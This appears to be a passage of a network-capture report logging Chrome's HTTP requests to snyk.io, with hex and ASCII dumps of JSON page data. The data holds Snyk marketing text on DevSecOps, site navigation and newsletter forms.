                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:09 UTC1019INData Raw: 5d 7d 2c 7b 22 6e 6f 64 65 54 79 70 65 22 3a 22 74 65 78 74 22 2c 22 76 61 6c 75 65 22 3a 22 22 2c 22 6d 61 72 6b 73 22 3a 5b 5d 2c 22 64 61 74 61 22 3a 7b 7d 7d 5d 7d 2c 7b 22 6e 6f 64 65 54 79 70 65 22 3a 22 70 61 72 61 67 72 61 70 68 22 2c 22 64 61 74 61 22 3a 7b 7d 2c 22 63 6f 6e 74 65 6e 74 22 3a 5b 7b 22 6e 6f 64 65 54 79 70 65 22 3a 22 74 65 78 74 22 2c 22 76 61 6c 75 65 22 3a 22 53 6f 20 68 6f 77 20 63 61 6e 20 61 6e 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 20 6d 61 6b 65 20 74 68 65 20 65 76 6f 6c 75 74 69 6f 6e 61 72 79 20 63 6c 69 6d 62 20 66 72 6f 6d 20 e2 80 9c 44 65 76 4f 70 73 e2 80 9d 20 74 6f 20 e2 80 9c 44 65 76 53 65 63 4f 70 73 e2 80 9d 3f 20 49 74 e2 80 99 73 20 6e 6f 74 20 61 73 20 73 69 6d 70 6c 65 20 61 73 20 6a 75 73 74 20 68 61 6e
                                                                                                                                                                                                                                                                                                              Data Ascii: ]},{"nodeType":"text","value":"","marks":[],"data":{}}]},{"nodeType":"paragraph","data":{},"content":[{"nodeType":"text","value":"So how can an organization make the evolutionary climb from DevOps to DevSecOps? Its not as simple as just han
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:09 UTC16384INData Raw: 30 30 30 30 34 30 30 30 0d 0a 65 22 3a 22 44 75 72 69 6e 67 20 74 68 65 20 70 6c 61 6e 6e 69 6e 67 20 70 72 6f 63 65 73 73 2c 20 70 61 72 74 69 63 75 6c 61 72 6c 79 20 61 73 20 69 74 20 72 65 6c 61 74 65 73 20 74 6f 20 69 6e 66 72 61 73 74 72 75 63 74 75 72 65 2c 20 73 65 63 75 72 69 74 79 20 65 6e 67 69 6e 65 65 72 73 20 73 68 6f 75 6c 64 20 62 65 20 69 6e 76 6f 6c 76 65 64 20 69 6e 20 64 69 73 63 75 73 73 69 6f 6e 73 2c 20 65 6d 70 6f 77 65 72 65 64 20 74 6f 20 70 75 73 68 20 62 61 63 6b 20 6f 6e 20 70 6f 6f 72 2f 69 6e 73 65 63 75 72 65 20 63 68 6f 69 63 65 73 2c 20 62 75 74 20 6b 6e 6f 77 6c 65 64 67 65 61 62 6c 65 20 65 6e 6f 75 67 68 20 74 6f 20 6f 66 66 65 72 20 61 6c 74 65 72 6e 61 74 69 76 65 73 2e 20 4f 66 74 65 6e 74 69 6d 65 73 2c 20 6f 76 65
                                                                                                                                                                                                                                                                                                              Data Ascii: 00004000e":"During the planning process, particularly as it relates to infrastructure, security engineers should be involved in discussions, empowered to push back on poor/insecure choices, but knowledgeable enough to offer alternatives. Oftentimes, ove
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:09 UTC12INData Raw: 74 54 79 70 65 22 3a 7b 22 73 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: tType":{"s
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:09 UTC11339INData Raw: 30 30 30 30 32 43 33 46 0d 0a 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 43 6f 6e 74 65 6e 74 54 79 70 65 22 2c 22 69 64 22 3a 22 6f 72 67 61 6e 69 73 6d 46 6f 6f 74 65 72 43 74 61 22 7d 7d 2c 22 6c 6f 63 61 6c 65 22 3a 22 65 6e 2d 55 53 22 7d 2c 22 66 69 65 6c 64 73 22 3a 7b 22 69 6e 74 65 72 6e 61 6c 4e 61 6d 65 22 3a 22 5c 22 47 65 74 20 73 74 61 72 74 65 64 20 66 6f 72 20 66 72 65 65 5c 22 20 2d 20 44 65 66 61 75 6c 74 22 2c 22 68 65 61 64 6c 69 6e 65 22 3a 22 53 74 61 72 74 20 73 65 63 75 72 69 6e 67 20 41 49 2d 67 65 6e 65 72 61 74 65 64 20 63 6f 64 65 22 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 63 6f 6e 74 65 6e 74 22 3a 5b 7b 22 64 61 74 61 22 3a 7b 7d 2c 22
                                                                                                                                                                                                                                                                                                              Data Ascii: 00002C3Fys":{"type":"Link","linkType":"ContentType","id":"organismFooterCta"}},"locale":"en-US"},"fields":{"internalName":"\"Get started for free\" - Default","headline":"Start securing AI-generated code","description":{"data":{},"content":[{"data":{},"
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:10 UTC16384INData Raw: 30 30 30 30 35 41 33 43 0d 0a 2f 61 70 70 6c 69 63 61 74 69 6f 6e 2d 73 65 63 75 72 69 74 79 2f 22 2c 22 61 70 70 65 61 72 61 6e 63 65 22 3a 7b 22 6e 61 76 49 74 65 6d 22 3a 7b 22 69 63 6f 6e 22 3a 22 73 68 69 65 6c 64 22 7d 7d 7d 2c 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 33 43 6e 55 31 75 78 59 4a 52 70 73 55 58 46 33 35 51 42 62 6d 68 22 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 53 79 73 22 7d 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 43 6f 6e 74 65 6e 74 4e 61 76 69 67 61 74 69 6f 6e 49 74 65 6d 22 2c 22 6c 61 62 65 6c 22 3a 22 53 6f 66 74 77 61 72 65 20 73 75 70 70 6c 79 20 63 68 61 69 6e 20 73 65 63 75 72 69 74 79 22 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4d 69 74 69 67 61 74 65 20 73 75 70 70 6c 79 20 63 68 61 69 6e 20 72 69 73 6b
                                                                                                                                                                                                                                                                                                              Data Ascii: 00005A3C/application-security/","appearance":{"navItem":{"icon":"shield"}}},{"sys":{"id":"3CnU1uxYJRpsUXF35QBbmh","__typename":"Sys"},"__typename":"ContentNavigationItem","label":"Software supply chain security","description":"Mitigate supply chain risk
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:10 UTC6728INData Raw: 64 6f 63 75 6d 65 6e 74 22 7d 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 43 6f 6e 74 65 6e 74 46 6f 72 6d 44 65 73 63 72 69 70 74 69 6f 6e 22 7d 2c 22 74 69 74 6c 65 22 3a 22 54 68 65 20 44 61 69 6c 79 20 56 75 6c 6e 22 2c 22 66 6f 72 6d 49 64 22 3a 22 31 30 35 31 22 2c 22 66 6f 72 6d 49 64 53 61 6e 64 62 6f 78 22 3a 22 31 30 35 31 22 2c 22 73 74 61 79 4f 6e 50 61 67 65 22 3a 74 72 75 65 2c 22 65 6e 66 6f 72 63 65 42 75 73 69 6e 65 73 73 45 6d 61 69 6c 22 3a 6e 75 6c 6c 2c 22 72 65 64 69 72 65 63 74 55 72 6c 22 3a 6e 75 6c 6c 2c 22 73 75 63 63 65 73 73 4d 65 73 73 61 67 65 22 3a 22 54 68 61 6e 6b 20 79 6f 75 21 20 59 6f 75 20 61 72 65 20 6e 6f 77 20 73 75 62 73 63 72 69 62 65 64 22 2c 22 69 73 49 6e 6c 69 6e 65 64 22 3a 74 72 75 65 7d 2c 22 66 6f 6f 74
                                                                                                                                                                                                                                                                                                              Data Ascii: document"},"__typename":"ContentFormDescription"},"title":"The Daily Vuln","formId":"1051","formIdSandbox":"1051","stayOnPage":true,"enforceBusinessEmail":null,"redirectUrl":null,"successMessage":"Thank you! You are now subscribed","isInlined":true},"foot
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:10 UTC12INData Raw: 30 30 30 30 30 30 30 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: 00000000


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                              70192.168.2.54982823.77.250.634434724C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:08 UTC667OUTGET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/solutions/application-security.json?slug=solutions&slug=application-security HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: snyk.io
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                              purpose: prefetch
                                                                                                                                                                                                                                                                                                              x-nextjs-data: 1
                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                              x-middleware-prefetch: 1
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              Cookie: user_utm={}
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:09 UTC644INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                              Content-Type: application/json
                                                                                                                                                                                                                                                                                                              ETag: W/"ycn3igbcer1m6s"
                                                                                                                                                                                                                                                                                                              Server: Vercel
                                                                                                                                                                                                                                                                                                              X-Matched-Path: /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/solutions/application-security.json
                                                                                                                                                                                                                                                                                                              X-Vercel-Cache: STALE
                                                                                                                                                                                                                                                                                                              X-Vercel-Id: arn1::iad1::dxzrw-1729799348768-89e3324a5534
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:49:08 GMT
                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Connection: Transfer-Encoding
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; preload
                                                                                                                                                                                                                                                                                                              Akamai-Cache-Status: NotCacheable from child
                                                                                                                                                                                                                                                                                                              Akamai-GRN: 0.5a1d4117.1729799348.1f60e35
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:09 UTC15740INData Raw: 30 30 30 30 43 30 30 30 0d 0a 7b 22 70 61 67 65 50 72 6f 70 73 22 3a 7b 22 70 61 67 65 22 3a 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 74 61 67 73 22 3a 5b 5d 2c 22 63 6f 6e 63 65 70 74 73 22 3a 5b 5d 7d 2c 22 73 79 73 22 3a 7b 22 73 70 61 63 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 53 70 61 63 65 22 2c 22 69 64 22 3a 22 6f 79 72 62 72 69 34 33 61 64 7a 7a 22 7d 7d 2c 22 69 64 22 3a 22 36 61 74 64 6a 6e 66 30 32 67 4e 32 6c 72 69 36 51 4a 75 74 70 43 22 2c 22 74 79 70 65 22 3a 22 45 6e 74 72 79 22 2c 22 63 72 65 61 74 65 64 41 74 22 3a 22 32 30 32 32 2d 31 31 2d 30 34 54 31 36 3a 33 35 3a 35 35 2e 34 36 30 5a 22 2c 22 75 70 64 61 74 65 64 41 74 22 3a 22 32 30 32 34 2d 30 33 2d 31 34 54
                                                                                                                                                                                                                                                                                                              Data Ascii: 0000C000{"pageProps":{"page":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"6atdjnf02gN2lri6QJutpC","type":"Entry","createdAt":"2022-11-04T16:35:55.460Z","updatedAt":"2024-03-14T
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:09 UTC15951INData Raw: 74 72 79 22 2c 22 63 72 65 61 74 65 64 41 74 22 3a 22 32 30 32 34 2d 30 31 2d 32 33 54 31 35 3a 35 39 3a 32 33 2e 35 35 36 5a 22 2c 22 75 70 64 61 74 65 64 41 74 22 3a 22 32 30 32 34 2d 30 37 2d 32 36 54 31 33 3a 31 34 3a 30 38 2e 32 33 37 5a 22 2c 22 65 6e 76 69 72 6f 6e 6d 65 6e 74 22 3a 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 6d 61 73 74 65 72 22 2c 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 45 6e 76 69 72 6f 6e 6d 65 6e 74 22 7d 7d 2c 22 70 75 62 6c 69 73 68 65 64 56 65 72 73 69 6f 6e 22 3a 31 35 2c 22 72 65 76 69 73 69 6f 6e 22 3a 33 2c 22 63 6f 6e 74 65 6e 74 54 79 70 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 43 6f 6e 74 65 6e 74 54 79 70 65 22
                                                                                                                                                                                                                                                                                                              Data Ascii: try","createdAt":"2024-01-23T15:59:23.556Z","updatedAt":"2024-07-26T13:14:08.237Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Environment"}},"publishedVersion":15,"revision":3,"contentType":{"sys":{"type":"Link","linkType":"ContentType"
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:09 UTC16384INData Raw: 75 69 6c 64 20 73 65 63 75 72 65 6c 79 20 66 72 6f 6d 20 74 68 65 20 73 74 61 72 74 2e 22 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 74 65 78 74 22 7d 5d 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 70 61 72 61 67 72 61 70 68 22 7d 5d 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 64 6f 63 75 6d 65 6e 74 22 7d 2c 22 61 63 74 69 6f 6e 73 22 3a 5b 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 74 61 67 73 22 3a 5b 5d 2c 22 63 6f 6e 63 65 70 74 73 22 3a 5b 5d 7d 2c 22 73 79 73 22 3a 7b 22 73 70 61 63 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 53 70 61 63 65 22 2c 22 69 64 22 3a 22 6f 79 72 62 72 69 34 33 61 64 7a 7a 22 7d 7d 2c 22 69 64 22 3a 22 32 32 4f 58 68 70 78 64 5a 45 59 52 58 37 4f 36 46 73 51 6d 76 6e 22
                                                                                                                                                                                                                                                                                                              Data Ascii: uild securely from the start.","nodeType":"text"}],"nodeType":"paragraph"}],"nodeType":"document"},"actions":[{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"22OXhpxdZEYRX7O6FsQmvn"
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:09 UTC1089INData Raw: 67 61 74 69 6f 6e 50 72 69 6d 61 72 79 41 63 74 69 6f 6e 73 43 6f 6c 6c 65 63 74 69 6f 6e 22 2c 22 69 74 65 6d 73 22 3a 5b 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 31 45 62 67 72 6d 6d 67 55 56 49 72 55 32 76 50 65 67 33 4d 4d 35 22 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 53 79 73 22 7d 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 41 74 6f 6d 42 75 74 74 6f 6e 22 2c 22 6c 61 62 65 6c 22 3a 22 4c 6f 67 20 69 6e 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 61 70 70 2e 73 6e 79 6b 2e 69 6f 2f 6c 6f 67 69 6e 22 2c 22 61 70 70 65 61 72 61 6e 63 65 22 3a 7b 22 62 75 74 74 6f 6e 22 3a 7b 22 76 61 72 69 61 6e 74 22 3a 22 64 65 66 61 75 6c 74 22 7d 7d 7d 2c 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 6a 5a 66 47 58 52 65 33 4c 39 55 74 49 48 64 30 7a 79
                                                                                                                                                                                                                                                                                                              Data Ascii: gationPrimaryActionsCollection","items":[{"sys":{"id":"1EbgrmmgUVIrU2vPeg3MM5","__typename":"Sys"},"__typename":"AtomButton","label":"Log in","url":"https://app.snyk.io/login","appearance":{"button":{"variant":"default"}}},{"sys":{"id":"jZfGXRe3L9UtIHd0zy
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:09 UTC16384INData Raw: 30 30 30 30 34 30 30 30 0d 0a 65 22 3a 22 4e 61 76 69 67 61 74 69 6f 6e 44 72 6f 70 64 6f 77 6e 4d 65 6e 75 43 6f 6c 75 6d 6e 22 2c 22 72 6f 77 73 22 3a 7b 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 4e 61 76 69 67 61 74 69 6f 6e 44 72 6f 70 64 6f 77 6e 4d 65 6e 75 43 6f 6c 75 6d 6e 52 6f 77 73 43 6f 6c 6c 65 63 74 69 6f 6e 22 2c 22 69 74 65 6d 73 22 3a 5b 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 37 70 4e 39 56 61 6b 6b 32 68 34 33 37 79 61 65 70 56 78 7a 30 63 22 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 53 79 73 22 7d 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 4e 61 76 69 67 61 74 69 6f 6e 44 72 6f 70 64 6f 77 6e 4d 65 6e 75 43 6f 6c 75 6d 6e 52 6f 77 22 2c 22 6c 61 62 65 6c 22 3a 22 50 72 6f 64 75 63 74 73 22 2c 22 73 70 6f 74 6c 69 67 68 74 46 69
                                                                                                                                                                                                                                                                                                              Data Ascii: 00004000e":"NavigationDropdownMenuColumn","rows":{"__typename":"NavigationDropdownMenuColumnRowsCollection","items":[{"sys":{"id":"7pN9Vakk2h437yaepVxz0c","__typename":"Sys"},"__typename":"NavigationDropdownMenuColumnRow","label":"Products","spotlightFi
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:09 UTC12INData Raw: 6f 77 73 43 6f 6c 6c 65 63 74 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: owsCollect
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:09 UTC9915INData Raw: 30 30 30 30 32 36 41 46 0d 0a 69 6f 6e 22 2c 22 69 74 65 6d 73 22 3a 5b 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 33 79 48 34 42 6f 62 71 54 6f 6d 4c 30 35 70 77 67 67 32 62 32 49 22 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 53 79 73 22 7d 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 4e 61 76 69 67 61 74 69 6f 6e 44 72 6f 70 64 6f 77 6e 4d 65 6e 75 43 6f 6c 75 6d 6e 52 6f 77 22 2c 22 6c 61 62 65 6c 22 3a 6e 75 6c 6c 2c 22 73 70 6f 74 6c 69 67 68 74 46 69 72 73 74 49 74 65 6d 22 3a 66 61 6c 73 65 2c 22 74 69 74 6c 65 54 65 78 74 22 3a 6e 75 6c 6c 2c 22 73 75 62 6d 65 6e 75 4c 69 6e 6b 73 22 3a 7b 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 4e 61 76 69 67 61 74 69 6f 6e 44 72 6f 70 64 6f 77 6e 4d 65 6e 75 43 6f 6c 75 6d 6e 52 6f 77 49 74 65 6d 73 43 6f 6c
                                                                                                                                                                                                                                                                                                              Data Ascii: 000026AFion","items":[{"sys":{"id":"3yH4BobqTomL05pwgg2b2I","__typename":"Sys"},"__typename":"NavigationDropdownMenuColumnRow","label":null,"spotlightFirstItem":false,"titleText":null,"submenuLinks":{"__typename":"NavigationDropdownMenuColumnRowItemsCol
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:09 UTC12INData Raw: 30 30 30 30 30 30 30 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: 00000000


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                              71192.168.2.54983323.45.111.1604434724C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:08 UTC395OUTGET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US.json HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: snyk.io
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              Cookie: user_utm={}
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:09 UTC611INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                              Content-Type: application/json
                                                                                                                                                                                                                                                                                                              ETag: W/"coaszi6dyw1itu"
                                                                                                                                                                                                                                                                                                              Server: Vercel
                                                                                                                                                                                                                                                                                                              X-Matched-Path: /_next/data/Cp4abAN54CGUdTYwS0J62/en-US.json
                                                                                                                                                                                                                                                                                                              X-Vercel-Cache: HIT
                                                                                                                                                                                                                                                                                                              X-Vercel-Id: fra1::iad1::g89wj-1729799348779-18e71e7dad83
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:49:08 GMT
                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Connection: Transfer-Encoding
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; preload
                                                                                                                                                                                                                                                                                                              Akamai-Cache-Status: NotCacheable from child
                                                                                                                                                                                                                                                                                                              Akamai-GRN: 0.42284317.1729799348.10945c8
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:09 UTC15773INData Raw: 30 30 30 30 36 30 30 30 0d 0a 7b 22 70 61 67 65 50 72 6f 70 73 22 3a 7b 22 70 61 67 65 22 3a 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 74 61 67 73 22 3a 5b 5d 2c 22 63 6f 6e 63 65 70 74 73 22 3a 5b 5d 7d 2c 22 73 79 73 22 3a 7b 22 73 70 61 63 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 53 70 61 63 65 22 2c 22 69 64 22 3a 22 6f 79 72 62 72 69 34 33 61 64 7a 7a 22 7d 7d 2c 22 69 64 22 3a 22 32 70 65 73 6e 52 55 64 34 45 75 51 74 44 6f 44 31 57 67 4b 48 52 22 2c 22 74 79 70 65 22 3a 22 45 6e 74 72 79 22 2c 22 63 72 65 61 74 65 64 41 74 22 3a 22 32 30 32 32 2d 30 37 2d 31 39 54 31 38 3a 35 39 3a 30 38 2e 35 38 38 5a 22 2c 22 75 70 64 61 74 65 64 41 74 22 3a 22 32 30 32 34 2d 30 36 2d 32 34 54
                                                                                                                                                                                                                                                                                                              Data Ascii: 00006000{"pageProps":{"page":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"2pesnRUd4EuQtDoD1WgKHR","type":"Entry","createdAt":"2022-07-19T18:59:08.588Z","updatedAt":"2024-06-24T
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:09 UTC8815INData Raw: 74 73 22 3a 5b 5d 7d 2c 22 73 79 73 22 3a 7b 22 73 70 61 63 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 53 70 61 63 65 22 2c 22 69 64 22 3a 22 6f 79 72 62 72 69 34 33 61 64 7a 7a 22 7d 7d 2c 22 69 64 22 3a 22 33 53 4d 78 56 69 73 64 37 75 54 69 57 52 32 7a 78 37 46 47 34 4d 22 2c 22 74 79 70 65 22 3a 22 45 6e 74 72 79 22 2c 22 63 72 65 61 74 65 64 41 74 22 3a 22 32 30 32 32 2d 31 31 2d 30 34 54 31 35 3a 34 32 3a 35 38 2e 38 36 31 5a 22 2c 22 75 70 64 61 74 65 64 41 74 22 3a 22 32 30 32 34 2d 30 33 2d 32 35 54 31 34 3a 30 35 3a 34 39 2e 32 32 30 5a 22 2c 22 65 6e 76 69 72 6f 6e 6d 65 6e 74 22 3a 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 6d 61 73 74 65 72 22 2c 22 74 79 70 65 22 3a 22 4c 69
                                                                                                                                                                                                                                                                                                              Data Ascii: ts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"3SMxVisd7uTiWR2zx7FG4M","type":"Entry","createdAt":"2022-11-04T15:42:58.861Z","updatedAt":"2024-03-25T14:05:49.220Z","environment":{"sys":{"id":"master","type":"Li
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:09 UTC16384INData Raw: 30 30 30 30 36 30 30 30 0d 0a 2c 22 73 79 73 22 3a 7b 22 73 70 61 63 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 53 70 61 63 65 22 2c 22 69 64 22 3a 22 6f 79 72 62 72 69 34 33 61 64 7a 7a 22 7d 7d 2c 22 69 64 22 3a 22 35 45 75 61 43 48 6d 46 32 4f 34 74 49 32 6c 47 43 72 65 42 36 77 22 2c 22 74 79 70 65 22 3a 22 45 6e 74 72 79 22 2c 22 63 72 65 61 74 65 64 41 74 22 3a 22 32 30 32 32 2d 30 37 2d 31 39 54 31 38 3a 30 38 3a 32 39 2e 31 34 33 5a 22 2c 22 75 70 64 61 74 65 64 41 74 22 3a 22 32 30 32 34 2d 31 30 2d 30 32 54 31 35 3a 35 37 3a 35 34 2e 34 38 35 5a 22 2c 22 65 6e 76 69 72 6f 6e 6d 65 6e 74 22 3a 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 6d 61 73 74 65 72 22 2c 22 74 79 70 65 22 3a
                                                                                                                                                                                                                                                                                                              Data Ascii: 00006000,"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"5EuaCHmF2O4tI2lGCreB6w","type":"Entry","createdAt":"2022-07-19T18:08:29.143Z","updatedAt":"2024-10-02T15:57:54.485Z","environment":{"sys":{"id":"master","type":
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:09 UTC8204INData Raw: 73 65 63 75 72 69 74 79 20 75 73 65 20 63 61 73 65 73 2e 22 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 74 65 78 74 22 7d 5d 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 70 61 72 61 67 72 61 70 68 22 7d 2c 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 63 6f 6e 74 65 6e 74 22 3a 5b 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 6d 61 72 6b 73 22 3a 5b 5d 2c 22 76 61 6c 75 65 22 3a 22 4e 6f 20 63 72 65 64 69 74 20 63 61 72 64 20 72 65 71 75 69 72 65 64 2e 22 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 74 65 78 74 22 7d 5d 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 70 61 72 61 67 72 61 70 68 22 7d 5d 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 64 6f 63 75 6d 65 6e 74 22 7d 2c 22 61 63 74 69 6f 6e 73 22 3a 5b 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 74 61 67 73 22 3a 5b 5d 2c 22 63 6f 6e 63 65 70 74 73
                                                                                                                                                                                                                                                                                                              Data Ascii: security use cases.","nodeType":"text"}],"nodeType":"paragraph"},{"data":{},"content":[{"data":{},"marks":[],"value":"No credit card required.","nodeType":"text"}],"nodeType":"paragraph"}],"nodeType":"document"},"actions":[{"metadata":{"tags":[],"concepts
